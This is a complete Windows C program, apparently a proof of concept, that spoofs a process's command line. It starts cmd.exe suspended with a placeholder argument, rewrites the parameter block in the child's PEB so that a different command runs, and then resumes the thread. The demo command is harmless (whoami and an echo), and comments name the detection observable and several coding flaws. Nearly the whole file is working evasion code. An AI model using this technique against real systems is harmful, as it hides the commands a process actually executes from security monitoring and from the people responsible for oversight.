#include <stddef.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <winternl.h> | |
int main(void) {
    /*
     * Demonstration of command-line spoofing on a 32-bit child process.
     *
     * The child (SysWow64\cmd.exe) is created suspended with a placeholder
     * command line (dummyInput). While it is still suspended, its
     * RTL_USER_PROCESS_PARAMETERS block (reached through the PEB) is copied
     * out, re-allocated remotely at the same address with an extra page, and
     * written back with CommandLine pointing at new_szCmdlineUnicode. Only
     * then is the main thread resumed.
     *
     * Defender note: the command line handed to CreateProcessW (what a
     * creation-time monitor records) and the one present in the PEB when the
     * thread actually runs differ. That mismatch is the observable for this
     * class of technique; a monitor that reads the command line only at
     * process creation sees the placeholder.
     */
    int ret = 0;                                /* exit code for the kill: path */
    PROCESS_INFORMATION PI = { 0 };
    STARTUPINFOW SI = { 0 };
    CONTEXT CTX = { CONTEXT_FULL };             /* ContextFlags: request full register set */
    RTL_USER_PROCESS_PARAMETERS processParam;   /* local copy of the child's parameter block */
    PEB peb;                                    /* local copy of the child's PEB */
    memset(&SI, 0, sizeof(SI));                 /* redundant: SI is already zero-initialised above */
    SI.cb = sizeof(SI);
    /* Placeholder command line passed to CreateProcessW (must be writable, hence an array). */
    WCHAR dummyInput[] = L"???????????????????????????????????????????????????????????????????????????????";
    /* Command line the child will actually see once the parameter block is rewritten. */
    WCHAR new_szCmdlineUnicode[] = L"cmd /c whoami & echo P1ay Win32 L!k3 a K!ng. & pause";
    /* CREATE_SUSPENDED: the child's initial thread does not run until ResumeThread below. */
    if (!CreateProcessW(L"C:\\Windows\\SysWow64\\cmd.exe", dummyInput, 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, &SI, &PI)) {
        puts("CreateProcessW failed");
        return 1;
    }
    if (!GetThreadContext(PI.hThread, &CTX)) {
        puts("GetThreadContext failed");
        return 2;
    }
    /*
     * The PEB address is taken from Ebx of the suspended initial thread. This
     * relies on the loader's start-up convention for a 32-bit process, which
     * the code does not verify. NOTE(review): ReadProcessMemory's return value
     * is ignored here and below; on failure peb/processParam hold garbage.
     */
    ReadProcessMemory(PI.hProcess, (LPVOID)CTX.Ebx, &peb, sizeof(peb), 0);
    RTL_USER_PROCESS_PARAMETERS *remote_ProcessParam = (RTL_USER_PROCESS_PARAMETERS *)peb.ProcessParameters;
    printf("ProcessParameters at %p\n", peb.ProcessParameters);
    ReadProcessMemory(PI.hProcess, (LPVOID)remote_ProcessParam, &processParam, sizeof(processParam), 0);
    ////////////////////////////////////////////////////////////////////////////////
    /* Size of the remote region that holds the parameter block; mbi.RegionSize drives every copy below. */
    MEMORY_BASIC_INFORMATION mbi;
    VirtualQueryEx(PI.hProcess, remote_ProcessParam, &mbi, sizeof(mbi));  /* NOTE(review): result unchecked */
    /* Local staging copy: the original region plus one extra page for the new command line string. */
    LPVOID local_buff = VirtualAlloc(NULL, mbi.RegionSize + 0x1000, MEM_COMMIT, PAGE_READWRITE);  /* NOTE(review): NULL unchecked */
    ReadProcessMemory(PI.hProcess, (LPVOID)remote_ProcessParam, local_buff, mbi.RegionSize, 0);
    /*
     * Release the remote region and re-allocate it at the same base with the
     * larger size. The PEB still points at remote_ProcessParam, so the
     * allocation must land exactly there (checked below); between the two
     * calls the child has no valid parameter block.
     */
    if(!VirtualFreeEx(PI.hProcess, remote_ProcessParam, 0, MEM_RELEASE)) {
        puts("VirtualFreeEx failed");
        ret = 3;
        goto kill;   /* NOTE(review): local_buff is not freed on this path */
    }
    LPVOID allocated = VirtualAllocEx(PI.hProcess, remote_ProcessParam, mbi.RegionSize + 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if(allocated != remote_ProcessParam) {
        puts("VirtualAllocEx failed");
        ret = 4;
        goto kill;   /* NOTE(review): local_buff is not freed on this path */
    }
    /*
     * Offset 4 of the block is overwritten with the new total size. winternl.h
     * hides the field behind Reserved1, so the name is not visible here —
     * presumably the structure's Length field; confirm against the layout.
     */
    *(ULONG*)((char *)local_buff + 4) = mbi.RegionSize + 0x1000;
    /* Append the new command line (including its terminating NUL) in the extra page of the local copy. */
    memcpy((char *)local_buff + mbi.RegionSize, new_szCmdlineUnicode, wcslen(new_szCmdlineUnicode) * 2 + 2);
    /* Point CommandLine at the remote address of that appended string; lengths are in bytes (sizeof(WCHAR) == 2). */
    UNICODE_STRING *s = &((RTL_USER_PROCESS_PARAMETERS*)local_buff)->CommandLine;
    s->Buffer = (LPWSTR)((char *)remote_ProcessParam + mbi.RegionSize);
    s->Length = wcslen(new_szCmdlineUnicode) * 2;       /* excludes the NUL */
    s->MaximumLength = s->Length + 2;                   /* includes the NUL */
    /* Write the whole patched block (original region + extra page) back into the child. */
    if(!WriteProcessMemory(PI.hProcess, remote_ProcessParam, local_buff, mbi.RegionSize + 0x1000, 0)) {
        ret = 5;
        goto kill;   /* NOTE(review): local_buff is not freed on this path */
    }
    VirtualFree(local_buff, 0, MEM_RELEASE);
    ////////////////////////////////////////////////////////////////////////////////
    printf("[+] run...\n\n");
    /* Pause so the suspended child can be inspected before it runs. */
    MessageBoxA(NULL, "RUN", "RUN", MB_ICONINFORMATION);
    ResumeThread(PI.hThread);
    /* Wait at most 5 s for the child; its exit status is not collected. */
    WaitForSingleObject(PI.hProcess, 5000);
    return 0;    /* NOTE(review): PI.hProcess / PI.hThread are never closed on either exit path */
kill:
    /* Error path: the child never ran, so kill it and report the code set above. */
    TerminateProcess(PI.hProcess, 0);
    return ret;
}